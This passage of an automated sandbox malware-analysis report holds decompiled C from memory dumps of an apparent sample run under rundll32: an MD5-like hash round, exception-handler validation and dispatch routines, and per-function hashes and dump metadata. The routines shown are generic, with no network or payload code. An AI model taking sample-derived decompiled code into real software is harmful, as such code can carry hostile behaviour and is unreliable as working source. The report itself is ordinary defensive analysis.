                                      					_t348 =  &(_t348[4]);
                                      					_t682 = _t682 - 1;
                                      				} while (_t682 != 0);
                                      				_t6 = _t226 + 4; // 0x14eb3fc3
                                      				_t683 =  *_t6;
                                      				_t7 = _t226 + 8; // 0x8d08458b
                                      				_t402 =  *_t7;
                                      				_t8 = _t226 + 0xc; // 0x56c1184c
                                      				_t349 =  *_t8;
                                      				asm("rol eax, 0x7");
                                      				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                      				asm("rol ecx, 0xc");
                                      				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                      				asm("ror edx, 0xf");
                                      				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                      				asm("ror esi, 0xa");
                                      				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                      				_v8 = _t685;
                                      				_t690 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                      				asm("rol ecx, 0xc");
                                      				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                      				asm("ror edx, 0xf");
                                      				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                      				asm("ror esi, 0xa");
                                      				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                      				_v8 = _t692;
                                      				_t697 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                      				asm("rol ecx, 0xc");
                                      				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                      				asm("ror edx, 0xf");
                                      				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                      				asm("ror esi, 0xa");
                                      				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                      				_v8 = _t699;
                                      				asm("rol eax, 0x7");
                                      				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                      				asm("rol ecx, 0xc");
                                      				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                      				_t508 =  !_t357;
                                      				asm("ror edx, 0xf");
                                      				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                      				_v12 = _t410;
                                      				_v12 =  !_v12;
                                      				asm("ror esi, 0xa");
                                      				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                      				asm("rol eax, 0x5");
                                      				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                      				asm("rol ecx, 0x9");
                                      				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                      				asm("rol edx, 0xe");
                                      				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                      				asm("ror esi, 0xc");
                                      				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                      				asm("rol eax, 0x5");
                                      				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                      				asm("rol ecx, 0x9");
                                      				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                      				asm("rol edx, 0xe");
                                      				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                      				asm("ror esi, 0xc");
                                      				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                      				asm("rol eax, 0x5");
                                      				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                      				asm("rol ecx, 0x9");
                                      				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                      				asm("rol edx, 0xe");
                                      				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                      				asm("ror esi, 0xc");
                                      				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                      				asm("rol eax, 0x5");
                                      				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                      				asm("rol ecx, 0x9");
                                      				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                      				asm("rol edx, 0xe");
                                      				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                      				asm("ror esi, 0xc");
                                      				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                      				asm("rol eax, 0x4");
                                      				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                      				asm("rol ecx, 0xb");
                                      				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                      				asm("rol edx, 0x10");
                                      				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                      				_t599 = _t367 ^ _t420;
                                      				asm("ror esi, 0x9");
                                      				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                      				asm("rol eax, 0x4");
                                      				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                      				asm("rol edi, 0xb");
                                      				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                      				asm("rol edx, 0x10");
                                      				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                      				_t338 = _t607 ^ _t422;
                                      				asm("ror ecx, 0x9");
                                      				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                      				asm("rol eax, 0x4");
                                      				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                      				asm("rol esi, 0xb");
                                      				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                      				asm("rol edi, 0x10");
                                      				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                      				_t424 = _t734 ^ _t613;
                                      				asm("ror ecx, 0x9");
                                      				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                      				asm("rol eax, 0x4");
                                      				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                      				asm("rol edx, 0xb");
                                      				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                      				asm("rol esi, 0x10");
                                      				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                      				asm("ror ecx, 0x9");
                                      				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                      				asm("rol eax, 0x6");
                                      				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                      				asm("rol edx, 0xa");
                                      				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                      				asm("rol esi, 0xf");
                                      				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                      				asm("ror ecx, 0xb");
                                      				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                      				asm("rol eax, 0x6");
                                      				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                      				asm("rol edx, 0xa");
                                      				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                      				asm("rol esi, 0xf");
                                      				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                      				asm("ror ecx, 0xb");
                                      				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                      				asm("rol eax, 0x6");
                                      				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                      				asm("rol edx, 0xa");
                                      				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                      				asm("rol esi, 0xf");
                                      				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                      				asm("ror edi, 0xb");
                                      				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                      				asm("rol eax, 0x6");
                                      				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                      				asm("rol edx, 0xa");
                                      				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                      				_t400 = _a4;
                                      				asm("rol esi, 0xf");
                                      				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                      				 *_t400 =  *_t400 + _t259;
                                      				asm("ror eax, 0xb");
                                      				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                      				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                      				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                      				return memset( &_v76, 0, 0x40);
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                      • Instruction ID: 79fdb6602c0f6f743f9a6cd10bacc2fb5b6ad8b061c1c358426880cb0196feed
                                      • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                      • Instruction Fuzzy Hash: 7022847BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B84C1(long _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				short* _v32;
                                      				void _v36;
                                      				void* _t57;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t62;
                                      				void* _t63;
                                      				signed int* _t68;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t77;
                                      				void* _t78;
                                      				void _t80;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				signed int _t86;
                                      				short* _t87;
                                      				void* _t89;
                                      				signed int* _t90;
                                      				long _t91;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				signed int _t102;
                                      				void* _t104;
                                      				long _t108;
                                      				signed int _t110;
                                      
                                      				_t108 = _a4;
                                      				_t76 =  *(_t108 + 8);
                                      				if((_t76 & 0x00000003) != 0) {
                                      					L3:
                                      					return 0;
                                      				}
                                      				_a4 =  *[fs:0x4];
                                      				_v8 =  *[fs:0x8];
                                      				if(_t76 < _v8 || _t76 >= _a4) {
                                      					_t102 =  *(_t108 + 0xc);
                                      					__eflags = _t102 - 0xffffffff;
                                      					if(_t102 != 0xffffffff) {
                                      						_t91 = 0;
                                      						__eflags = 0;
                                      						_a4 = 0;
                                      						_t57 = _t76;
                                      						do {
                                      							_t80 =  *_t57;
                                      							__eflags = _t80 - 0xffffffff;
                                      							if(_t80 == 0xffffffff) {
                                      								goto L9;
                                      							}
                                      							__eflags = _t80 - _t91;
                                      							if(_t80 >= _t91) {
                                      								L20:
                                      								_t63 = 0;
                                      								L60:
                                      								return _t63;
                                      							}
                                      							L9:
                                      							__eflags =  *(_t57 + 4);
                                      							if( *(_t57 + 4) != 0) {
                                      								_t12 =  &_a4;
                                      								 *_t12 = _a4 + 1;
                                      								__eflags =  *_t12;
                                      							}
                                      							_t91 = _t91 + 1;
                                      							_t57 = _t57 + 0xc;
                                      							__eflags = _t91 - _t102;
                                      						} while (_t91 <= _t102);
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L15:
                                      							_t81 =  *0x44ba380; // 0x0
                                      							_t110 = _t76 & 0xfffff000;
                                      							_t58 = 0;
                                      							__eflags = _t81;
                                      							if(_t81 <= 0) {
                                      								L18:
                                      								_t104 = _t102 | 0xffffffff;
                                      								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                      								__eflags = _t61;
                                      								if(_t61 < 0) {
                                      									_t62 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									_t62 = _a4;
                                      								}
                                      								__eflags = _t62;
                                      								if(_t62 == 0) {
                                      									L59:
                                      									_t63 = _t104;
                                      									goto L60;
                                      								} else {
                                      									__eflags = _v12 - 0x1000000;
                                      									if(_v12 != 0x1000000) {
                                      										goto L59;
                                      									}
                                      									__eflags = _v16 & 0x000000cc;
                                      									if((_v16 & 0x000000cc) == 0) {
                                      										L46:
                                      										_t63 = 1;
                                      										 *0x44ba3c8 = 1;
                                      										__eflags =  *0x44ba3c8;
                                      										if( *0x44ba3c8 != 0) {
                                      											goto L60;
                                      										}
                                      										_t84 =  *0x44ba380; // 0x0
                                      										__eflags = _t84;
                                      										_t93 = _t84;
                                      										if(_t84 <= 0) {
                                      											L51:
                                      											__eflags = _t93;
                                      											if(_t93 != 0) {
                                      												L58:
                                      												 *0x44ba3c8 = 0;
                                      												goto L5;
                                      											}
                                      											_t77 = 0xf;
                                      											__eflags = _t84 - _t77;
                                      											if(_t84 <= _t77) {
                                      												_t77 = _t84;
                                      											}
                                      											_t94 = 0;
                                      											__eflags = _t77;
                                      											if(_t77 < 0) {
                                      												L56:
                                      												__eflags = _t84 - 0x10;
                                      												if(_t84 < 0x10) {
                                      													_t86 = _t84 + 1;
                                      													__eflags = _t86;
                                      													 *0x44ba380 = _t86;
                                      												}
                                      												goto L58;
                                      											} else {
                                      												do {
                                      													_t68 = 0x44ba388 + _t94 * 4;
                                      													_t94 = _t94 + 1;
                                      													__eflags = _t94 - _t77;
                                      													 *_t68 = _t110;
                                      													_t110 =  *_t68;
                                      												} while (_t94 <= _t77);
                                      												goto L56;
                                      											}
                                      										}
                                      										_t69 = 0x44ba384 + _t84 * 4;
                                      										while(1) {
                                      											__eflags =  *_t69 - _t110;
                                      											if( *_t69 == _t110) {
                                      												goto L51;
                                      											}
                                      											_t93 = _t93 - 1;
                                      											_t69 = _t69 - 4;
                                      											__eflags = _t93;
                                      											if(_t93 > 0) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                      									_t87 = _v32;
                                      									__eflags =  *_t87 - 0x5a4d;
                                      									if( *_t87 != 0x5a4d) {
                                      										goto L59;
                                      									}
                                      									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                      									__eflags =  *_t71 - 0x4550;
                                      									if( *_t71 != 0x4550) {
                                      										goto L59;
                                      									}
                                      									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                      									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                      										goto L59;
                                      									}
                                      									_t78 = _t76 - _t87;
                                      									__eflags =  *((short*)(_t71 + 6));
                                      									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                      									if( *((short*)(_t71 + 6)) <= 0) {
                                      										goto L59;
                                      									}
                                      									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                      									__eflags = _t78 - _t72;
                                      									if(_t78 < _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                      									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                      										goto L46;
                                      									}
                                      									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                      									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                      										goto L20;
                                      									}
                                      									goto L46;
                                      								}
                                      							} else {
                                      								goto L16;
                                      							}
                                      							while(1) {
                                      								L16:
                                      								__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 + 1;
                                      								__eflags = _t58 - _t81;
                                      								if(_t58 < _t81) {
                                      									continue;
                                      								}
                                      								goto L18;
                                      							}
                                      							__eflags = _t58;
                                      							if(_t58 <= 0) {
                                      								goto L5;
                                      							}
                                      							 *0x44ba3c8 = 1;
                                      							__eflags =  *0x44ba3c8;
                                      							if( *0x44ba3c8 != 0) {
                                      								goto L5;
                                      							}
                                      							__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
                                      							if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
                                      								L32:
                                      								_t100 = 0;
                                      								__eflags = _t58;
                                      								if(_t58 < 0) {
                                      									L34:
                                      									 *0x44ba3c8 = 0;
                                      									goto L5;
                                      								} else {
                                      									goto L33;
                                      								}
                                      								do {
                                      									L33:
                                      									_t90 = 0x44ba388 + _t100 * 4;
                                      									_t100 = _t100 + 1;
                                      									__eflags = _t100 - _t58;
                                      									 *_t90 = _t110;
                                      									_t110 =  *_t90;
                                      								} while (_t100 <= _t58);
                                      								goto L34;
                                      							}
                                      							_t25 = _t81 - 1; // -1
                                      							_t58 = _t25;
                                      							__eflags = _t58;
                                      							if(_t58 < 0) {
                                      								L28:
                                      								__eflags = _t81 - 0x10;
                                      								if(_t81 < 0x10) {
                                      									_t81 = _t81 + 1;
                                      									__eflags = _t81;
                                      									 *0x44ba380 = _t81;
                                      								}
                                      								_t28 = _t81 - 1; // 0x0
                                      								_t58 = _t28;
                                      								goto L32;
                                      							} else {
                                      								goto L25;
                                      							}
                                      							while(1) {
                                      								L25:
                                      								__eflags =  *((intOrPtr*)(0x44ba388 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0x44ba388 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 - 1;
                                      								__eflags = _t58;
                                      								if(_t58 >= 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							__eflags = _t58;
                                      							if(__eflags >= 0) {
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                      						_t75 =  *((intOrPtr*)(_t108 - 8));
                                      						__eflags = _t75 - _v8;
                                      						if(_t75 < _v8) {
                                      							goto L20;
                                      						}
                                      						__eflags = _t75 - _t108;
                                      						if(_t75 >= _t108) {
                                      							goto L20;
                                      						}
                                      						goto L15;
                                      					}
                                      					L5:
                                      					_t63 = 1;
                                      					goto L60;
                                      				} else {
                                      					goto L3;
                                      				}
                                      			}




































                                      APIs
                                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 044B8572
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: MemoryQueryVirtual
                                      • String ID:
                                      • API String ID: 2850889275-0
                                      • Opcode ID: e787db368f67f552b6332eaa69b1b70a7b6f72b476ccfc0b472bc8e784eb0266
                                      • Instruction ID: 7f28e323381edf91c0476b2cbb3d3893f3c4b505bbd9c220bca6b9f932aea0f8
                                      • Opcode Fuzzy Hash: e787db368f67f552b6332eaa69b1b70a7b6f72b476ccfc0b472bc8e784eb0266
                                      • Instruction Fuzzy Hash: 946193706006069FDF29AE29C4906EA73A9EB85354B24C92BD486D7391FB35F84287F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E00402274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				void* __ebp;
                                      				signed int* _t43;
                                      				char _t44;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t53;
                                      				void* _t54;
                                      				void* _t65;
                                      				long _t66;
                                      				signed int* _t80;
                                      				signed int* _t82;
                                      				void* _t84;
                                      				signed int _t86;
                                      				void* _t89;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t99;
                                      				void* _t106;
                                      
                                      				_t43 = _t84;
                                      				_t65 = __ebx + 2;
                                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                      				_t89 = _t95;
                                      				_t96 = _t95 - 8;
                                      				_push(_t65);
                                      				_push(_t84);
                                      				_push(_t89);
                                      				asm("cld");
                                      				_t66 = _a8;
                                      				_t44 = _a4;
                                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                      					_push(_t89);
                                      					E004023DB(_t66 + 0x10, _t66, 0xffffffff);
                                      					_t46 = 1;
                                      				} else {
                                      					_v12 = _t44;
                                      					_v8 = _a12;
                                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                      					_t86 =  *(_t66 + 0xc);
                                      					_t80 =  *(_t66 + 8);
                                      					_t49 = E00402495(_t66);
                                      					_t99 = _t96 + 4;
                                      					if(_t49 == 0) {
                                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                      						goto L11;
                                      					} else {
                                      						while(_t86 != 0xffffffff) {
                                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                      							if(_t53 == 0) {
                                      								L8:
                                      								_t80 =  *(_t66 + 8);
                                      								_t86 = _t80[_t86 + _t86 * 2];
                                      								continue;
                                      							} else {
                                      								_t54 =  *_t53();
                                      								_t89 = _t89;
                                      								_t86 = _t86;
                                      								_t66 = _a8;
                                      								_t55 = _t54;
                                      								_t106 = _t54;
                                      								if(_t106 == 0) {
                                      									goto L8;
                                      								} else {
                                      									if(_t106 < 0) {
                                      										_t46 = 0;
                                      									} else {
                                      										_t82 =  *(_t66 + 8);
                                      										E00402380(_t55, _t66);
                                      										_t89 = _t66 + 0x10;
                                      										E004023DB(_t89, _t66, 0);
                                      										_t99 = _t99 + 0xc;
                                      										E00402477(_t82[2], 1);
                                      										 *(_t66 + 0xc) =  *_t82;
                                      										_t66 = 0;
                                      										_t86 = 0;
                                      										 *(_t82[2])();
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							goto L13;
                                      						}
                                      						L11:
                                      						_t46 = 1;
                                      					}
                                      				}
                                      				L13:
                                      				return _t46;
                                      			}























                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                      • Instruction ID: c3b74f21b36d53aafec6f67f7e05ba827982a1db6c455aeb72717833d71b06b4
                                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                      • Instruction Fuzzy Hash: D121C4729002049BCB14DF79C9848ABB7A5FF48350B4580AAEC55AB2C5D778FA15C7E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E044B829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				void* __ebp;
                                      				signed int* _t43;
                                      				char _t44;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t53;
                                      				void* _t54;
                                      				void* _t65;
                                      				long _t66;
                                      				signed int* _t80;
                                      				signed int* _t82;
                                      				void* _t84;
                                      				signed int _t86;
                                      				void* _t89;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t99;
                                      				void* _t106;
                                      
                                      				_t43 = _t84;
                                      				_t65 = __ebx + 2;
                                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                      				_t89 = _t95;
                                      				_t96 = _t95 - 8;
                                      				_push(_t65);
                                      				_push(_t84);
                                      				_push(_t89);
                                      				asm("cld");
                                      				_t66 = _a8;
                                      				_t44 = _a4;
                                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                      					_push(_t89);
                                      					E044B8407(_t66 + 0x10, _t66, 0xffffffff);
                                      					_t46 = 1;
                                      				} else {
                                      					_v12 = _t44;
                                      					_v8 = _a12;
                                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                      					_t86 =  *(_t66 + 0xc);
                                      					_t80 =  *(_t66 + 8);
                                      					_t49 = E044B84C1(_t66);
                                      					_t99 = _t96 + 4;
                                      					if(_t49 == 0) {
                                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                      						goto L11;
                                      					} else {
                                      						while(_t86 != 0xffffffff) {
                                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                      							if(_t53 == 0) {
                                      								L8:
                                      								_t80 =  *(_t66 + 8);
                                      								_t86 = _t80[_t86 + _t86 * 2];
                                      								continue;
                                      							} else {
                                      								_t54 =  *_t53();
                                      								_t89 = _t89;
                                      								_t86 = _t86;
                                      								_t66 = _a8;
                                      								_t55 = _t54;
                                      								_t106 = _t54;
                                      								if(_t106 == 0) {
                                      									goto L8;
                                      								} else {
                                      									if(_t106 < 0) {
                                      										_t46 = 0;
                                      									} else {
                                      										_t82 =  *(_t66 + 8);
                                      										E044B83AC(_t55, _t66);
                                      										_t89 = _t66 + 0x10;
                                      										E044B8407(_t89, _t66, 0);
                                      										_t99 = _t99 + 0xc;
                                      										E044B84A3(_t82[2]);
                                      										 *(_t66 + 0xc) =  *_t82;
                                      										_t66 = 0;
                                      										_t86 = 0;
                                      										 *(_t82[2])(1);
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							goto L13;
                                      						}
                                      						L11:
                                      						_t46 = 1;
                                      					}
                                      				}
                                      				L13:
                                      				return _t46;
                                      			}
























                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction ID: bb1fa36793f4a6ceebf3a85dbb9ed525833721fd00b7ab4fef8ce03881db127e
